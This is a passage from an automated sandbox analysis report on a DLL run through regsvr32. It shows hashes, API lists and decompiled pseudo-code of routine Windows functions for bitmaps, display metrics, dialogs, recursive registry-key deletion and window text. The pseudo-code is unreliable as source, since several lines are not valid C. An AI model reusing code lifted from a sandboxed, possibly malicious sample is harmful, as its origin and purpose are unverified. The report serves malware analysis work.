                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                        • String ID: System
                                                                                                        • API String ID: 1529587224-3470857405
                                                                                                        • Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
                                                                                                        • Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
                                                                                                        • Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
                                                                                                        • Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E1000B3AF(void* __edx, signed int _a116, char _a120) {
                                                                                                        				void _v12;
                                                                                                        				char _v16;
                                                                                                        				signed int _v20;
                                                                                                        				int _v24;
                                                                                                        				char _v124;
                                                                                                        				char _v172;
                                                                                                        				intOrPtr _v184;
                                                                                                        				int __ebx;
                                                                                                        				signed int __edi;
                                                                                                        				signed int __esi;
                                                                                                        				signed int __ebp;
                                                                                                        				signed int _t26;
                                                                                                        				unsigned int _t28;
                                                                                                        				intOrPtr _t35;
                                                                                                        				unsigned int _t39;
                                                                                                        				intOrPtr _t40;
                                                                                                        				void* _t42;
                                                                                                        				void* _t43;
                                                                                                        				signed int _t45;
                                                                                                        
                                                                                                        				_t45 =  &_v124;
                                                                                                        				_t26 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_a116 = _t26 ^ _t45;
                                                                                                        				_push(_t43);
                                                                                                        				_push(_t42);
                                                                                                        				_t28 = GetMenuCheckMarkDimensions();
                                                                                                        				_t38 = _t28;
                                                                                                        				_t39 = _t28 >> 0x10;
                                                                                                        				_v24 = _t39;
                                                                                                        				if(_t28 <= 4 || __ecx <= 5) {
                                                                                                        					_push(_t45);
                                                                                                        					_push(_t39);
                                                                                                        					_v172 = 0x10057298;
                                                                                                        					E10017C83( &_v172, 0x1002e2fc);
                                                                                                        					asm("int3");
                                                                                                        					_push(4);
                                                                                                        					E10017BC1(E10027DEC, _t38, _t42, _t43);
                                                                                                        					_t40 = E10013965(0x104);
                                                                                                        					_v184 = _t40;
                                                                                                        					_t35 = 0;
                                                                                                        					_v172 = 0;
                                                                                                        					if(_t40 != 0) {
                                                                                                        						_t35 = E1000CF71(_t40);
                                                                                                        					}
                                                                                                        					return E10017C60(_t35);
                                                                                                        				} else {
                                                                                                        					if(__ebx > 0x20) {
                                                                                                        						__ebx = 0x20;
                                                                                                        					}
                                                                                                        					__eax = __ebx - 4;
                                                                                                        					asm("cdq");
                                                                                                        					__eax = __ebx - 4 - __edx;
                                                                                                        					__esi = __ebx + 0xf;
                                                                                                        					__esi = __ebx + 0xf >> 4;
                                                                                                        					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
                                                                                                        					__esi = __esi << 4;
                                                                                                        					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
                                                                                                        					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
                                                                                                        					if(__edi > 0xc) {
                                                                                                        						__edi = 0xc;
                                                                                                        					}
                                                                                                        					__eax = 0x20;
                                                                                                        					if(__ecx > __eax) {
                                                                                                        						_v24 = __eax;
                                                                                                        					}
                                                                                                        					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
                                                                                                        					_v24 = _v24 + 0xfffffffa;
                                                                                                        					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
                                                                                                        					__ecx = __esi + __esi;
                                                                                                        					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
                                                                                                        					__edx = 0x1002a144;
                                                                                                        					_v20 = __esi + __esi;
                                                                                                        					_v16 = 5;
                                                                                                        					do {
                                                                                                        						__si =  *__edx & 0x000000ff;
                                                                                                        						__ecx = __edi;
                                                                                                        						__si = ( *__edx & 0x000000ff) << __cl;
                                                                                                        						__edx =  &(__edx[1]);
                                                                                                        						__ecx = __si & 0x0000ffff;
                                                                                                        						__eax->i = __ch;
                                                                                                        						__eax->i = __cl;
                                                                                                        						__eax = __eax + _v20;
                                                                                                        						_t21 =  &_v16;
                                                                                                        						 *_t21 = _v16 - 1;
                                                                                                        					} while ( *_t21 != 0);
                                                                                                        					__eax =  &_v12;
                                                                                                        					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
                                                                                                        					_pop(__edi);
                                                                                                        					_pop(__esi);
                                                                                                        					 *0x1005aa80 = __eax;
                                                                                                        					_pop(__ebx);
                                                                                                        					if(__eax == 0) {
                                                                                                        						__eax = LoadBitmapA(__eax, 0x7fe3);
                                                                                                        						 *0x1005aa80 = __eax;
                                                                                                        					}
                                                                                                        					__ecx = _a116;
                                                                                                        					__ecx = _a116 ^ __ebp;
                                                                                                        					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
                                                                                                        					__ebp =  &_a120;
                                                                                                        					__esp =  &_a120;
                                                                                                        					_pop(__ebp);
                                                                                                        					return __eax;
                                                                                                        				}
                                                                                                        			}






















                                                                                                        0x1000b3b0
                                                                                                        0x1000b3ba
                                                                                                        0x1000b3c1
                                                                                                        0x1000b3c5
                                                                                                        0x1000b3c6
                                                                                                        0x1000b3c7
                                                                                                        0x1000b3cd
                                                                                                        0x1000b3d6
                                                                                                        0x1000b3d9
                                                                                                        0x1000b3dc
                                                                                                        0x1000a0db
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000b3e8
                                                                                                        0x1000b3eb
                                                                                                        0x1000b3ef
                                                                                                        0x1000b3ef
                                                                                                        0x1000b3f0
                                                                                                        0x1000b3f3
                                                                                                        0x1000b3f4
                                                                                                        0x1000b3f6
                                                                                                        0x1000b3f9
                                                                                                        0x1000b3fe
                                                                                                        0x1000b402
                                                                                                        0x1000b405
                                                                                                        0x1000b407
                                                                                                        0x1000b40c
                                                                                                        0x1000b410
                                                                                                        0x1000b410
                                                                                                        0x1000b413
                                                                                                        0x1000b416
                                                                                                        0x1000b418
                                                                                                        0x1000b418
                                                                                                        0x1000b429
                                                                                                        0x1000b431
                                                                                                        0x1000b439
                                                                                                        0x1000b43c
                                                                                                        0x1000b43f
                                                                                                        0x1000b443
                                                                                                        0x1000b448
                                                                                                        0x1000b44b
                                                                                                        0x1000b452
                                                                                                        0x1000b452
                                                                                                        0x1000b456
                                                                                                        0x1000b458
                                                                                                        0x1000b45b
                                                                                                        0x1000b45f
                                                                                                        0x1000b462
                                                                                                        0x1000b464
                                                                                                        0x1000b467
                                                                                                        0x1000b46a
                                                                                                        0x1000b46a
                                                                                                        0x1000b46a
                                                                                                        0x1000b46f
                                                                                                        0x1000b47b
                                                                                                        0x1000b483
                                                                                                        0x1000b484
                                                                                                        0x1000b485
                                                                                                        0x1000b48a
                                                                                                        0x1000b48b
                                                                                                        0x1000b493
                                                                                                        0x1000b499
                                                                                                        0x1000b499
                                                                                                        0x1000b49e
                                                                                                        0x1000b4a1
                                                                                                        0x1000b4a3
                                                                                                        0x1000b4a8
                                                                                                        0x1000b4ab
                                                                                                        0x1000b4ab
                                                                                                        0x1000b4ac
                                                                                                        0x1000b4ac

                                                                                                        APIs
                                                                                                        • GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
                                                                                                        • _memset.LIBCMT ref: 1000B429
                                                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
                                                                                                        • LoadBitmapA.USER32 ref: 1000B493
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4271682439-3916222277
                                                                                                        • Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
                                                                                                        • Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
                                                                                                        • Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
                                                                                                        • Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                        				void _v20;
                                                                                                        				int _t14;
                                                                                                        				int _t18;
                                                                                                        				intOrPtr* _t23;
                                                                                                        				void* _t25;
                                                                                                        
                                                                                                        				if(E1000D6C3() == 0) {
                                                                                                        					if(_a4 != 0x12340042) {
                                                                                                        						L9:
                                                                                                        						_t14 = 0;
                                                                                                        						L10:
                                                                                                        						return _t14;
                                                                                                        					}
                                                                                                        					_t23 = _a8;
                                                                                                        					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                                                        						goto L9;
                                                                                                        					} else {
                                                                                                        						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                                                        						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                                                        						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                                                        						_t18 = GetSystemMetrics(1);
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						 *(_t23 + 0x10) = _t18;
                                                                                                        						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                                                        						if( *_t23 >= 0x48) {
                                                                                                        							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                                                                                                        						}
                                                                                                        						_t14 = 1;
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return  *0x1005a760(_a4, _a8);
                                                                                                        			}








                                                                                                        0x1000d87c
                                                                                                        0x1000d895
                                                                                                        0x1000d900
                                                                                                        0x1000d900
                                                                                                        0x1000d902
                                                                                                        0x00000000
                                                                                                        0x1000d903
                                                                                                        0x1000d897
                                                                                                        0x1000d89e
                                                                                                        0x00000000
                                                                                                        0x1000d8b7
                                                                                                        0x1000d8b8
                                                                                                        0x1000d8bb
                                                                                                        0x1000d8c9
                                                                                                        0x1000d8cc
                                                                                                        0x1000d8d4
                                                                                                        0x1000d8d5
                                                                                                        0x1000d8d6
                                                                                                        0x1000d8d7
                                                                                                        0x1000d8de
                                                                                                        0x1000d8e1
                                                                                                        0x1000d8e5
                                                                                                        0x1000d8f4
                                                                                                        0x1000d8f9
                                                                                                        0x1000d8fc
                                                                                                        0x00000000
                                                                                                        0x1000d8fc
                                                                                                        0x1000d89e
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
                                                                                                        • GetSystemMetrics.USER32 ref: 1000D8C5
                                                                                                        • GetSystemMetrics.USER32 ref: 1000D8CC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: System$Metrics$InfoParameters
                                                                                                        • String ID: B$DISPLAY
                                                                                                        • API String ID: 3136151823-3316187204
                                                                                                        • Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
                                                                                                        • Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
                                                                                                        • Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
                                                                                                        • Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                                                                                                        				void* __edi;
                                                                                                        				struct HWND__* _t10;
                                                                                                        				struct HWND__* _t12;
                                                                                                        				struct HWND__* _t14;
                                                                                                        				struct HWND__* _t15;
                                                                                                        				int _t19;
                                                                                                        				void* _t21;
                                                                                                        				void* _t25;
                                                                                                        				struct HWND__** _t26;
                                                                                                        				void* _t27;
                                                                                                        
                                                                                                        				_t25 = __edx;
                                                                                                        				_t21 = __ebx;
                                                                                                        				_t26 = _a4;
                                                                                                        				_t27 = __ecx;
                                                                                                        				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
                                                                                                        					_t10 = E1001040B(__ecx);
                                                                                                        					__eflags = _t10;
                                                                                                        					if(_t10 == 0) {
                                                                                                        						L5:
                                                                                                        						__eflags = _t26[1] - 0x100;
                                                                                                        						if(_t26[1] != 0x100) {
                                                                                                        							L13:
                                                                                                        							return E1000E426(_t26);
                                                                                                        						}
                                                                                                        						_t12 = _t26[2];
                                                                                                        						__eflags = _t12 - 0x1b;
                                                                                                        						if(_t12 == 0x1b) {
                                                                                                        							L8:
                                                                                                        							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								goto L13;
                                                                                                        							}
                                                                                                        							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
                                                                                                        							__eflags = _t14;
                                                                                                        							if(_t14 == 0) {
                                                                                                        								goto L13;
                                                                                                        							}
                                                                                                        							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                                                                                                        							__eflags = _t15;
                                                                                                        							if(_t15 == 0) {
                                                                                                        								L12:
                                                                                                        								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							_t19 = IsWindowEnabled(_t15);
                                                                                                        							__eflags = _t19;
                                                                                                        							if(_t19 == 0) {
                                                                                                        								goto L13;
                                                                                                        							}
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        						__eflags = _t12 - 3;
                                                                                                        						if(_t12 != 3) {
                                                                                                        							goto L13;
                                                                                                        						}
                                                                                                        						goto L8;
                                                                                                        					}
                                                                                                        					__eflags =  *(_t10 + 0x68);
                                                                                                        					if( *(_t10 + 0x68) == 0) {
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				return 1;
                                                                                                        			}













                                                                                                        0x1000c570
                                                                                                        0x1000c570
                                                                                                        0x1000c572
                                                                                                        0x1000c577
                                                                                                        0x1000c580
                                                                                                        0x1000c589
                                                                                                        0x1000c58e
                                                                                                        0x1000c590
                                                                                                        0x1000c59c
                                                                                                        0x1000c59c
                                                                                                        0x1000c5a3
                                                                                                        0x1000c5fe
                                                                                                        0x00000000
                                                                                                        0x1000c601
                                                                                                        0x1000c5a5
                                                                                                        0x1000c5a8
                                                                                                        0x1000c5ab
                                                                                                        0x1000c5b2
                                                                                                        0x1000c5bc
                                                                                                        0x1000c5be
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c5c7
                                                                                                        0x1000c5cc
                                                                                                        0x1000c5ce
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c5d5
                                                                                                        0x1000c5db
                                                                                                        0x1000c5dd
                                                                                                        0x1000c5ea
                                                                                                        0x1000c5f6
                                                                                                        0x00000000
                                                                                                        0x1000c5f6
                                                                                                        0x1000c5e0
                                                                                                        0x1000c5e6
                                                                                                        0x1000c5e8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c5e8
                                                                                                        0x1000c5ad
                                                                                                        0x1000c5b0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c5b0
                                                                                                        0x1000c592
                                                                                                        0x1000c596
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c598
                                                                                                        0x1000c582
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Edit
                                                                                                        • API String ID: 0-554135844
                                                                                                        • Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
                                                                                                        • Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
                                                                                                        • Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
                                                                                                        • Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t25;
                                                                                                        				signed int _t30;
                                                                                                        				void* _t32;
                                                                                                        				signed int _t34;
                                                                                                        				signed int _t42;
                                                                                                        				void* _t43;
                                                                                                        				void* _t44;
                                                                                                        				char** _t54;
                                                                                                        				void* _t55;
                                                                                                        				void* _t58;
                                                                                                        				char* _t59;
                                                                                                        				void* _t61;
                                                                                                        
                                                                                                        				_t42 = __ebx;
                                                                                                        				_t59 = _t61 - 0x104;
                                                                                                        				_t25 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_t59[0x108] = _t25 ^ _t59;
                                                                                                        				_push(0x18);
                                                                                                        				E10017BF4(E10027F23, __ebx, __edi, __esi);
                                                                                                        				_t54 = _t59[0x118];
                                                                                                        				_t44 = _t59[0x114];
                                                                                                        				_t52 = _t59 - 0x18;
                                                                                                        				 *(_t59 - 0x20) = _t44;
                                                                                                        				 *(_t59 - 0x1c) = _t54;
                                                                                                        				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
                                                                                                        				_t57 = _t30;
                                                                                                        				if(_t30 == 0) {
                                                                                                        					while(1) {
                                                                                                        						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
                                                                                                        						_t57 = _t34;
                                                                                                        						_t66 = _t57;
                                                                                                        						if(_t57 != 0) {
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
                                                                                                        						_push(_t59);
                                                                                                        						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
                                                                                                        						 *(_t59 - 4) = 1;
                                                                                                        						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
                                                                                                        						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
                                                                                                        						 *(_t59 - 4) = 0;
                                                                                                        						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
                                                                                                        						if(_t42 == 0) {
                                                                                                        							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					__eflags = _t57 - 0x103;
                                                                                                        					if(_t57 == 0x103) {
                                                                                                        						L6:
                                                                                                        						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
                                                                                                        					} else {
                                                                                                        						__eflags = _t57 - 0x3f2;
                                                                                                        						if(_t57 == 0x3f2) {
                                                                                                        							goto L6;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					RegCloseKey( *(_t59 - 0x18));
                                                                                                        				}
                                                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
                                                                                                        				_pop(_t55);
                                                                                                        				_pop(_t58);
                                                                                                        				_pop(_t43);
                                                                                                        				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
                                                                                                        				__eflags =  &(_t59[0x10c]);
                                                                                                        				return _t32;
                                                                                                        			}
















                                                                                                        0x1000bc89
                                                                                                        0x1000bc90
                                                                                                        0x1000bc94
                                                                                                        0x1000bc9b
                                                                                                        0x1000bca1
                                                                                                        0x1000bca8
                                                                                                        0x1000bcad
                                                                                                        0x1000bcb5
                                                                                                        0x1000bcbb
                                                                                                        0x1000bcc1
                                                                                                        0x1000bcc4
                                                                                                        0x1000bcc7
                                                                                                        0x1000bccd
                                                                                                        0x1000bcd1
                                                                                                        0x1000bcd7
                                                                                                        0x1000bce5
                                                                                                        0x1000bceb
                                                                                                        0x1000bced
                                                                                                        0x1000bcef
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000bcf1
                                                                                                        0x1000bcf7
                                                                                                        0x1000bcfb
                                                                                                        0x1000bd07
                                                                                                        0x1000bd13
                                                                                                        0x1000bd17
                                                                                                        0x1000bd1d
                                                                                                        0x1000bd21
                                                                                                        0x1000bd28
                                                                                                        0x1000bd2a
                                                                                                        0x00000000
                                                                                                        0x1000bd2a
                                                                                                        0x00000000
                                                                                                        0x1000bd28
                                                                                                        0x1000bd4b
                                                                                                        0x1000bd51
                                                                                                        0x1000bd5b
                                                                                                        0x1000bd66
                                                                                                        0x1000bd53
                                                                                                        0x1000bd53
                                                                                                        0x1000bd59
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000bd59
                                                                                                        0x1000bd6b
                                                                                                        0x1000bd6b
                                                                                                        0x1000bd76
                                                                                                        0x1000bd7e
                                                                                                        0x1000bd7f
                                                                                                        0x1000bd80
                                                                                                        0x1000bd89
                                                                                                        0x1000bd8e
                                                                                                        0x1000bd95

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1000BCA8
                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1000BD6B
                                                                                                          • Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 301487041-0
                                                                                                        • Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
                                                                                                        • Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
                                                                                                        • Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
                                                                                                        • Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v263;
                                                                                                        				char _v264;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t9;
                                                                                                        				struct HWND__* _t21;
                                                                                                        				void* _t22;
                                                                                                        				intOrPtr _t25;
                                                                                                        				void* _t26;
                                                                                                        				int _t27;
                                                                                                        				CHAR* _t28;
                                                                                                        				signed int _t29;
                                                                                                        
                                                                                                        				_t25 = __edx;
                                                                                                        				_t22 = __ecx;
                                                                                                        				_t9 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v8 = _t9 ^ _t29;
                                                                                                        				_t21 = _a4;
                                                                                                        				_t32 = _t21;
                                                                                                        				_t28 = _a8;
                                                                                                        				if(_t21 == 0) {
                                                                                                        					L1:
                                                                                                        					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
                                                                                                        				}
                                                                                                        				if(_t28 == 0) {
                                                                                                        					goto L1;
                                                                                                        				}
                                                                                                        				_t27 = lstrlenA(_t28);
                                                                                                        				_v264 = 0;
                                                                                                        				E100174D0(_t27,  &_v263, 0, 0xff);
                                                                                                        				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
                                                                                                        					_t16 = SetWindowTextA(_t21, _t28);
                                                                                                        				}
                                                                                                        				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
                                                                                                        			}


















                                                                                                        0x10013f9e
                                                                                                        0x10013f9e
                                                                                                        0x10013fa7
                                                                                                        0x10013fae
                                                                                                        0x10013fb2
                                                                                                        0x10013fb5
                                                                                                        0x10013fb8
                                                                                                        0x10013fbc
                                                                                                        0x10013fbe
                                                                                                        0x10013fbe
                                                                                                        0x10013fbe
                                                                                                        0x10013fc5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013fd3
                                                                                                        0x10013fde
                                                                                                        0x10013fe5
                                                                                                        0x10013ff4
                                                                                                        0x1001401d
                                                                                                        0x1001401d
                                                                                                        0x10014031

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
                                                                                                        • _memset.LIBCMT ref: 10013FE5
                                                                                                        • GetWindowTextA.USER32 ref: 10013FFF
                                                                                                        • lstrcmpA.KERNEL32(00000000,?), ref: 10014011
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 1001401D
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
